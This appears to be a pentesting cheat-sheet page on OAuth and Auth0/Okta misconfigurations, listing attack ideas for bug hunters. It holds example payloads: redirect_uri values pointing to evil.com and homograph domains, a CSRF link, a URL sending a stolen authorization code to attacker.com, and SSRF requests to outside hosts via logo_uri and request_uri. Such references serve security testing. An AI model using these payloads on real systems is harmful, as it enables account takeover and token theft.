OAuth / Okta Misconfiguration

Okta Misconfiguration

The client_id and connection parameters, crucial to the system's environment, can be obtained through various methods. One approach involves intentionally attempting to authenticate with invalid credentials.

After acquiring the client_id and connection parameters, the next step involves verifying if the system supports registration through the Auth0 API. To do this, we initiate a POST request to "/dbconnections/signup"

Exploiting Security Misconfiguration In Auth0 By OktaMedium

---

OAuth Detection

In the SSO feature. For example the URL will be looks like this

https://example/signin?response_type=code&redirect_uri=https://callback_url/auth&client_id=FQ9RGtMkztAgmAApKOqACrBNq&state=7tvPJiv8StrAqo9IQE9xsJaDso4&scope=+profile+email+phone+group+role+resource

Exploit

https://www.target.com/login?client_id=123&redirect_url=https://www.target.com/redirect?redirect=1&url=https://www.zseano.com/

1. OAuth token stealing by changing redirect_uri and Use IDN Homograph

   • Normal parameter

     &redirect_uri=https://example.com

   • IDN Homograph

     &redirect_uri=https://еxamplе.com

   If you notice, im not using the normal e

2. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials.
3. OAuth Token Re-use.

4. Improper handling of state parameter

   To exploit this, go through the authorization process under your account and pause immediately after authorization. Then send this URL to the logged-in victim

   • CSRF Attack

     <a href="https://example.com/authorize?client_id=client1&response_type=code&redirect_uri=http://callback&scope=openid+email+profile">Press Here</a>

5. Lack of origin check.

6. Open Redirection on redirect_uri parameter

   • Normal parameter

     &redirect_uri=https://example.com

   • Open Redirect

     &redirect_uri=https://evil.com
     &redirect_uri=https://example.com.evil.com
     etc.

7. If there is an email parameter after signin then try to change the email parameter to victim's one.

8. Try to remove email from the scope and add victim's email manually.

9. Check if its leaking client_secret

land parameter

https://example.com/authcallback?land=https://attacker.com

After successful authentication, the authorization server redirects the user to a specified URI with an authorization code

https://example.com/authcallback?code=AUTH_CODE&state=STATE

Craft a URL that redirects this code to a malicious domain

https://example.com/authcallback?land=https://attacker.com/steal?code=AUTH_CODE&state=STATE

🚨 From Open Redirect to Full Account Takeover: Exploiting OAuth MisconfigurationMedium

SSRF

Hidden OAuth attack vectorsPortSwigger Research

logo_uri and jwks_uri are particularly interesting for SSRF attacks

CVE-2021-26715: SSRF via "logo_uri" in MITREid Connect

POST /openid-connect-server-webapp/register HTTP/1.1
Host: local:8080
Content-Length: 118
Content-Type: application/json

{
  "redirect_uris": [
    "http://artsploit.com/redirect"
  ],
  "logo_uri": "http://artsploit.com/xss.html"
}

request_uri

GET /authorize?response_type=code%20id_token&client_id=sclient1&request_uri=https://ybd1rc7ylpbqzygoahtjh6v0frlh96.burpcollaborator.net/request.jwt

Dirty Dancing

Account hijacking using "dirty dancing" in sign-in OAuth-flows - Labs DetectifyLabs Detectify

Resources

Common OAuth Vulnerabilities · Doyensec's Blog

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.